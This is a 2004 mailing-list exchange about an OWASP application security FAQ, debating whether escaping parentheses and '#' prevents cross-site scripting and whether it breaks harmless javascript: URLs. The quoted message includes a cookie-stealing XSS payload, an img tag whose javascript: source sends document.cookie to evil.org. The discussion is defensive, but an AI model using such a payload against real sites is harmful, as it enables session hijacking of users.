Re: AppSec FAQ at OWASP

[オマル イスマイル <isumai-u () is aist-nara ac jp>]

On 2004.1.29, at 06:40  PM, Sangita Pakala wrote:

> Thank you Ulf for the nice words. To address your question:
>
> > Why is it important to escape "(", ")" and "#"?
>
> We need to escape these characters to take care of CSS that do not rely
> on <script> tags. For instance, the "javascript:" construct could be
> used to embed scripts without using the <script> tag. In the example
> below, let's say that the user's input is reflected as the value for
> <img src= >. Now, when the img src= line is encountered, the  
> window.open
> javascript function is called and the cookie sent to evil.org
>
> <img src=
> "Javascript:window.open('http:// 
> www.evil.org?cookie='+document.cookie)">
>
> Escaping the "(" and ")" above renders the function call mute.
>
> If someone can point me to a good example for when escaping "#" is  
> reqd,
> I'd love to hear that. Gunter Ollmann has an excellent article on CSS
> and special characters at http://www.technicalinfo.net/papers/CSS.html
>
> Regards,
> Sangita.
>
> Sangita Pakala
> Paladion Networks
> http://www.paladion.net

Sangita,

I would like to know that how you deal with the false positive?
In the case of " <img src= "javascript: preview(....)> or <img  
src="javascript:window.close()>..etc..etc..
If you escape the "(" and ")"  that means you render out the harmless  
Javascript too.

Thanks
~~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~
Omarjan Ismail
Internet Engineering Lab,
Graduate School of Information Science
Nara Institute of Science and Technology
Nara, Japan, 630-0101

Isumai-u () is aist-nara ac jp

~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~~~